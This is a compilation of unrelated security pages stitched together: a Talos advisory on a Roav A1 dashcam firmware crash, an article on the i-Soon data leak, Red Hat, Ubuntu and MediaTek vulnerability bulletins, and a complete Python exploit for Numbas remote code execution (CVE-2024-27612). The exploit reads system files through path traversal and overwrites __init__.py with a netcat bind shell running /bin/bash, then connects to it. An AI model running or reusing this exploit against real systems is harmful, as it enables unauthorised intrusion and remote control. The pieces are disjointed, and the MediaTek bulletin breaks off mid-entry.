An exploitable denial-of-service vulnerability exists in the XML_GetScreen Wi-Fi command of the NT9665X Chipset firmware, running on the Anker Roav A1 Dashcam, version RoavA1SWV1.9. A specially crafted set of packets can cause an invalid memory dereference, resulting in a device reboot.

**Summary**

An exploitable denial-of-service vulnerability exists in the XML_GetScreen Wi-Fi command of the NT9665X Chipset firmware, running on the Anker Roav A1 Dashcam, version “RoavA1\_SW\_V1.9.” A specially crafted set of packets can cause an invalid memory dereference, resulting in a device reboot.

**Tested Versions**

Anker Roav A1 Dashcam RoavA1\_SW\_V1.9

**Product URLs**

https://goroav.com/products/roav-dash-cam-a1

**CVSSv3 Score**

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

**CWE**

CWE-252: Unchecked Return Value

**Details**

The Novatek NT9665X SOC is a chipset used in an large number of consumer camera devices, particularly in dashboard cameras. The chip provides default firmware that is a fork of the Embedded Configurable Operating System (eCOS) project, which is found within the Roav A1 Dashcam,the product we are focusing on in this advisory.

The Roav A1 Dashcam by Anker is a dashboard camera that allows users to connect using the Roav app for Android and iOS so that they can control the camera remotely. In order to do this, users must first enable the “Wi-Fi AP” setting manually on the dashcam, and then connect to the “Roav\_A1\_” SSID, with the default password of “goroavcam”.

From here, the app interacts mainly with the dashboard camera via an eCOS webserver running on port 80 that requires no authentication. The standard HTTP POST, GET, and DELETE requests can be used to upload, download or delete videos and pictures from the dashcam, but there’s also a separate interface used for configuration. When requesting any url, a set of commands is accessed by providing the following http query string: ?custom=1&cmd=<0000-9999>. It should be noted that only a firmware-specific subset of commands are implemented on any given device, the list of which can be found by accessing http://192.168.1.254/?custom=1&cmd=3012.

For the following vulnerability, the XML_GetScreen command (4001) will be discussed. Like all the other WiFi commands, the prototype for this function is:

    XML_GetScreen(char *URLPath,
    char *QueryStr,
    char *POSTData,
    size_t PostDataLen,
    ???,
    ???);
    

The XML_GetScreen command is used to get a screenshot from a given file. For the default “.mov” files, it will read in the videos to produce this, and for any other type of file the program will search for and parse out a screenshot from the EXIF data, if any.

To start, the function first searches to see if there’s an available buffer to read the data into, and if not, the default XML response is sent and the function returns. This buffer address is gotten via a small stub that calls a function pointer that’s been dubbed get_movie_temp_buff as it heuristically has led to the Movie_GetTempBuffer function.

The Wi-Fi command 3001 must first be called to make sure that the camera has an available “temp” movie buffer allocated, which can be done with a cURL command or just browsing to 192.168.1.254/?custom=1&cmd=3001. The rest of the code flow becomes available after the buffer is created, starting with the following:

    ROM:8022411C   la      $a1, aImageJpeg  # "image/jpeg"
    ROM:80224120   move    $a0, $s5
    ROM:80224124   jal     strcpy
    ROM:80224128   addiu   $s3, $fp, 0x158+var_AC
    ROM:8022412C   move    $a0, $s0     // [0]    
    ROM:80224130   jal     fixup_path   # (srcpath,dstPath)
    ROM:80224134   move    $a1, $s3	// [1]
    ROM:80224138   move    $a0, $s3	// [2]
    ROM:8022413C   jal     fancy_strchr
    ROM:80224140   li      $a1, "."         
    ROM:80224144   addiu   $s0, $v0, 1   
    ROM:80224148   la      $a1, aMov_1      # "mov"
    ROM:80224150   move    $a0, $s0     // [3]     
    ROM:80224154   jal     strncmp
    ROM:80224158   li      $a2, 3
    ROM:8022415C   bnez    $v0, loc_80224278
    ROM:80224160   lui     $a1, 0x8047   
    

The path of the HTTP request is moved to $a0 of the fixup_path function at \[0\], the output of which is thrown into the stack variable var_AC \[1\]. This fixed path is then passed to a function that resembles a strchr call, looking for the ‘.’ character, after which it looks for ‘mov.’

The issue here lies solely at \[3\] though, as there’s no check on the return value of this strchr call. In the event that the path of the HTTP request does not contain a ‘.’, if it only contains a ‘.’, or if it only contains ‘..’, the strchr will return NULL, which implies that $s0 will contain 0x1, causing a bad memory read within the call to strncmp(0x1,”mov”,3), resulting in a device crash.

**Crash Output**

    WifiCmd_Lock(): Lock
    WifiCmd_DispatchCmd(): cmd:4002 evt:0 par:-2134199650 CB:802240c0 wait:0
    WifiCmd_DispatchCmd(): ret 0
    *** CPU Exception!!! cause 0x02: TLB exception (load or instruction fetch)
    epc  - 0x800af980
    $ra  - 0x8022415c
    $sp  - 0x80caaca0
    $fp  - 0x80caaca0
    general registers:
         $zero : 0x80cbf620       $at : 0x80caac40       $v0 : 0x00000001       $v1 : 0x00000000
           $a0 : 0x00000001       $a1 : 0x804698f4       $a2 : 0x00000003       $a3 : 0x01010101
           $t0 : 0x7fffc5be       $t1 : 0x01010101       $t2 : 0x80ca57d4       $t3 : 0x00000012
           $t4 : 0x00000008       $t5 : 0x807d2bb4       $t6 : 0x00000015       $t7 : 0x80aed924
           $s0 : 0x00000001       $s1 : 0x80caaeb0       $s2 : 0x80cab8e8       $s3 : 0x80caad4c
           $s4 : 0x00010400       $s5 : 0x80caaee4       $s6 : 0x80cab8e8       $s7 : 0x00000000
           $t8 : 0x807d2bb4       $t9 : 0x00002000      null : 0x00000008      null : 0x80caac88
            gp : 0x8060f540        sp : 0x80caaca0        fp : 0x80caaca0        ra : 0x8022415c
    co-processor registers:
       entrylo : 0x00000002    status : 0x00000008    vector : 0x0100c403       epc : 0x800af980
         cause : 0x00000000  badvaddr : 0x00800008    hwrena : 0x00000400      prid : 0x00019655
       entrylo : 0x01215792
    Thread(id) :
    
      Hfs Session(260)
    stack      :
        range(0x80ca57b4 - 0x80cab7b4)
    call stack :
      0 frame(0x80caaca0 - 0x80caacb8) ............................ $pc : 0x800af980
         + 0x80caaca0 : 0xfffffffe 0x00000001 0x00000000 0x000001ff
         + 0x80caacb0 : 0xdeadbeef 0xdeadbeef
      end
    *** CPU Exception in Task[]! cause=0x00000002, addr=0x800af980
    

**Timeline**

2018-10-29 - Talos contacts vendor  
2018-11-02 - Report disclosed to vendor  
2018-12-04 - 30 day follow up  
2019-01-18 - 60 day follow up - Talos reaches out to TWNCERT for assistance reaching vendor (Novatek)>br> 2019-01-22 - TWNCERT contacted Novatek and advised Novatek will check emails for reports  
2019-03-06 - 90+ day follow up - Talos asks TWNCERT for direct point of contact for Novatek  
2019-03-27 - Talos sends follow up to TWNCERT  
2019-04-02 - Talos sends copies of email correspondence and reports to TWNCERT  
2019-04-18 - Suggested pubic disclosure date of 2019-05-13 (171 days after initial disclosure)  
2019-04-19 - Vendor fixed issue and provided patch to their IDH  
2019-05-13 - Public disclosure

Discovered by Lilith \[<\_<\] of Cisco Talos.

CVE-2018-4026: TALOS-2018-0698 || Cisco Talos Intelligence Group

Data from a Chinese cybersecurity vendor that works for the Chinese government exposed a range of hacking tools and services.

Data from a Chinese cybersecurity vendor that works for the Chinese government has exposed a range of hacking tools and services. Although the source is not entirely clear, it seems that a disgruntled staff member of the group leaked the information on purpose.

The vendor, i-Soon (aka Anxun) is believed to be a private contractor that operates as an Advanced Persistent Threat (APT)\-for-hire, servicing China’s Ministry of Public Security (MPS).

The leaked data is organized in a few groups, such as complaints about the company, chat records, financial information, products, employee information, and details about foreign infiltration. According to the leaked data, i-Soon infiltrated several government departments, including those from India, Thailand, Vietnam, South Korea, and NATO.

Some of the tools that i-Soon used are impressive enough. Some highlights:

*   Twitter (now X) stealer: Features include obtaining the user’s Twitter email and phone number, real-time monitoring, reading personal messages, and publishing tweets on the user’s behalf.
*   Custom Remote Access Trojans (RATs) for Windows x64/x86: Features include process/service/registry management, remote shell, keylogging, file access logging, obtaining system information, disconnecting remotely, and uninstallation.
*   The iOS version of the RAT also claims to authorize and support all iOS device versions without jailbreaking, with features ranging from hardware information, GPS data, contacts, media files, and real-time audio records as an extension. (Note: this part dates back to 2020)
*   The Android version can dump messages from all popular Chinese chatting apps QQ, WeChat, Telegram, and MoMo and is capable of elevating the system app for persistence against internal recovery.
*   Portable devices for attacking networks from the inside.
*   Special equipment for operatives working abroad to establish safe communication.
*   User lookup database which lists user data including phone number, name, and email, and can be correlated with social media accounts.
*   Targeted automatic penetration testing scenario framework.

While some of the information is dated, the leaked data provide an inside look in the operations that go on in a leading spyware vendor and APT-for-hire.

It will certainly rattle some cages at the infiltrated entities and as such it could possibly cause a shift in international diplomacy and expose the holes in the national security of several countries.

Not all of the material has been examined yet. There is a lot available and translating is not an easy task. But we will keep you posted if anything else of interest shows up.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 A first analysis of the i-Soon data leak 

Red Hat Security Advisory 2023-5603-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include denial of service, out of bounds write, and use-after-free vulnerabilities.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5603.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive. Going forward, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security and bug fix update  
Advisory ID:        RHSA-2023:5603-01  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:5603  
Issue date:         2023-10-10  
Revision:           01  
CVE Names:          CVE-2023-1206  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: net/sched: Use-after-free vulnerabilities in the net/sched classifiers: cls_fw, cls_u32 and cls_route (CVE-2023-4128)

* kernel: nf_tables: use-after-free in nft_chain_lookup_byid() (CVE-2023-31248)

* kernel: nf_tables: stack-out-of-bounds-read in nft_byteorder_eval() (CVE-2023-35001)

* kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt() (CVE-2023-35788)

* kernel: hash collisions in the IPv6 connection lookup table (CVE-2023-1206)

* kernel: Spectre v2 SMT mitigations problem (CVE-2023-1998)

* kernel: fbcon: shift-out-of-bounds in fbcon_set_font() (CVE-2023-3161)

* kernel: denial of service problem in net/unix/diag.c (CVE-2023-28327)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-9.0.z12 Batch (BZ#2232645)

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

CVEs:

CVE-2023-1206

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-5603-01

A flaw was found in htmldoc in v1.9.12 and before. Null pointer dereference in file_extension(),in file.c may lead to execute arbitrary code and denial of service.

Published: **3 June 2021**

\[Unknown description\]

**Status**

Package

Release

Status

htmldoc  
Launchpad, Ubuntu, Debian

bionic

Not vulnerable  

focal

Released (1.9.7-1ubuntu0.2)  

groovy

Ignored (reached end-of-life)  

hirsute

Released (1.9.11-2ubuntu0.1)  

impish

Not vulnerable (1.9.11-4)  

trusty

Does not exist  

upstream

Released (1.9.11-4)  

xenial

Ignored (out of standard support)  

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23180
*   https://github.com/michaelrsweet/htmldoc/issues/418
*   https://github.com/michaelrsweet/htmldoc/commit/19c582fb32eac74b57e155cffbb529377a9e751a
*   https://ubuntu.com/security/notices/USN-5198-1
*   NVD
*   Launchpad
*   Debian

**Bugs**

*   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989437

CVE-2021-23180: CVE-2021-23180 | Ubuntu

Numbas versions prior to 7.3 suffer from a remote code execution vulnerability.

    # Exploit Title: Numbas < v7.3 - Remote Code Execution# Google Dork: N/A# Date: March 7th, 2024# Exploit Author: Matheus Boschetti# Vendor Homepage: https://www.numbas.org.uk/# Software Link: https://github.com/numbas/Numbas# Version: 7.2 and below# Tested on: Linux# CVE: CVE-2024-27612import sys, requests, re, argparse, subprocess, timefrom bs4 import BeautifulSoups = requests.session()def getCSRF(target):    url = f"http://{target}/"    req = s.get(url)    soup = BeautifulSoup(req.text, 'html.parser')    csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']    return csrfmiddlewaretokendef createTheme(target):    # Format request    csrfmiddlewaretoken = getCSRF(target)    theme = 'ExampleTheme'    boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'    data = (        f'--{boundary}\r\n'        'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'        '\r\n'        f'{csrfmiddlewaretoken}\r\n'        f'--{boundary}\r\n'        'Content-Disposition: form-data; name="name"\r\n'        '\r\n'        f'{theme}\r\n'        f'--{boundary}--\r\n'    )    headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',               'User-Agent': 'Mozilla/5.0',               'Accept': '*/*',               'Connection': 'close'}    # Create theme and return its ID    req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)    redir = req.url    split = redir.split('/')    id = split[4]    print(f"\t[i] Theme created with ID {id}")    return iddef login(target, user, passwd):    print("\n[i] Attempting to login...")    csrfmiddlewaretoken = getCSRF(target)    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,            'username': user,            'password': passwd,            'next': '/'}        # Login    login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)    res = login.text    if("Logged in as" not in res):        print("\n\n[!] Login failed!")        sys.exit(-1)    # Check if logged and fetch ID    usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)    if usermatch:        user = usermatch.group(1)        idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)        if idmatch:            id = idmatch.group(1)            print(f"\t[+] Logged in as \"{user}\" with ID {id}")def checkVuln(url):    print("[i] Checking if target is vulnerable...")    # Attempt to read files    themeID = createTheme(url)    target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."    hname = s.get(f"{target}/etc/hostname")    ver = s.get(f"{target}/etc/issue")    hnamesoup = BeautifulSoup(hname.text, 'html.parser')    versoup = BeautifulSoup(ver.text, 'html.parser')    hostname = hnamesoup.find('textarea').get_text().strip()    version = versoup.find('textarea').get_text().strip()    if len(hostname) < 1:        print("\n\n[!] Something went wrong - target might not be vulnerable.")        sys.exit(-1)    print(f"\n[+] Target \"{hostname}\" is vulnerable!")    print(f"\t[i] Running: \"{version}\"")    # Cleanup - delete theme    print(f"\t\t[i] Cleanup: deleting theme {themeID}...")    target = f"http://{url}/themes/{themeID}/delete"    csrfmiddlewaretoken = getCSRF(url)    data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}    s.post(target, data=data)def replaceInit(target):    # Overwrite __init__.py with arbitrary code    rport = '8443'    payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"    csrfmiddlewaretoken = getCSRF(target)    filename = '../../../../numbas_editor/numbas/__init__.py'    themeID = createTheme(target)    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,            'source': payload,            'filename': filename}    print("[i] Delivering payload...")    # Retry 5 times in case something goes wrong...    for attempt in range(5):        try:            s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)        except Exception as e:            pass        # Establish connection to bind shell    time.sleep(2)    print(f"\t[+] Payload delivered, establishing connection...\n")    if ":" in target:        split = target.split(":")        ip = split[0]    else:        ip = str(target)    subprocess.Popen(["nc", "-n", ip, rport])    while True:        passdef main():    parser = argparse.ArgumentParser()    if len(sys.argv) <= 1:        print("\n[!] No option provided!")        print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")        print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")        sys.exit(-1)    group = parser.add_mutually_exclusive_group(required=True)    group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')    parser.add_argument('--target', help='Target IP:PORT')    parser.add_argument('--user', help='Username to authenticate')    parser.add_argument('--passwd', help='Password to authenticate')    args = parser.parse_args()    action = args.action    target = args.target    user = args.user    passwd = args.passwd    print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")        if action == 'check':        login(target, user, passwd)        checkVuln(target)    elif action == 'exploit':        login(target, user, passwd)        replaceInit(target)    else:        sys.exit(-1)if __name__ == "__main__":    main()

Numbas Remote Code Execution

In scp, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06988728; Issue ID: ALPS06988728.

**August 2022 Product Security Bulletin**

Published 2022-08-01

The MediaTek Product Security Bulletin contains details of security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT and NBIoT chipsets. Device OEMs have been notified of all the issues and the corresponding security patches for at least two months before publication.

The severity of the identified vulnerabilities was conducted based on the Common Vulnerability Scoring System version 3.1 (CVSS v3.1).

****Summary****

Severity

**CVEs**

High

CVE-2022-26437

Medium

CVE-2022-21789, CVE-2022-21790, CVE-2022-21791, CVE-2022-21792, CVE-2022-26426, CVE-2022-26427, CVE-2022-26428, CVE-2022-26429, CVE-2022-21788, CVE-2022-26430, CVE-2022-26431, CVE-2022-26432, CVE-2022-26433, CVE-2022-26434, CVE-2022-26435, CVE-2022-26436, CVE-2022-26438, CVE-2022-26439, CVE-2022-26440, CVE-2022-26441, CVE-2022-26442, CVE-2022-26443, CVE-2022-26444, CVE-2022-26445

****Details****

CVE

**CVE-2022-26437**

Title

Out-of-bounds write in httpclient

Severity

High

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In httpclient, there is a possible out of bounds write due to uninitialized data. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT2621, MT2625

Affected Software Versions

NBIOT SDK V2.8.1

CVE

**CVE-2022-21789**

Title

Concurrent execution using shared resource with improper synchronization ('race condition') in audio ipi

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Description

In audio ipi, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6779, MT6781, MT6785, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT6985, MT8791, MT8797, MT8798

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21790**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21791**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6885, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21792**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26426**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6893, MT8167, MT8167S, MT8168, MT8175, MT8185, MT8362A, MT8365, MT8385, MT8666, MT8675, MT8765, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26427**

Title

Improper input validation in camera isp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In camera isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6893

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26428**

Title

Concurrent execution using shared resource with improper synchronization ('race condition') in video codec

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Description

In video codec, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6761, MT6765, MT6771, MT8163, MT8167, MT8173, MT8183, MT8362A, MT8385, MT8695

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-26429**

Title

Improper access control in cta

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-284 Improper Access Control

Description

In cta, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6739, MT6757, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6893, MT6895, MT6983, MT8168, MT8173, MT8185, MT8321, MT8365, MT8385, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-21788**

Title

Detection of error condition without action in scp

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-390 Detection of Error Condition Without Action

Description

In scp, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6895, MT6983

Affected Software Versions

Android 12.0

CVE

**CVE-2022-26430**

Title

Access of resource using incompatible type ('type confusion') in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In mailbox, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8185, MT8321, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26431**

Title

Improper input validation in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In mailbox, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8185, MT8321, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26432**

Title

Improper input validation in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In mailbox, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8185, MT8321, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26433**

Title

Access of resource using incompatible type ('type confusion') in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In mailbox, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26434**

Title

Improper input validation in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In mailbox, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26435**

Title

Access of resource using incompatible type ('type confusion') in mailbox

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In mailbox, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8532, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0 or Yocto 3.1, 3.3

CVE

**CVE-2022-26436**

Title

Improper input validation in emi mpu

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In emi mpu, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6855, MT6879, MT6895, MT6983

Affected Software Versions

Android 12.0

CVE

**CVE-2022-26438**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26439**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26440**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26441**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26442**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26443**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In wifi driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT7603, MT7610, MT7612, MT7613, MT7615, MT7620, MT7622, MT7628, MT7629, MT7915, MT7916, MT7986, MT8981

Affected Software Versions

7.6.2.3

CVE

**CVE-2022-26444**

Title

Improper input validation in wifi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

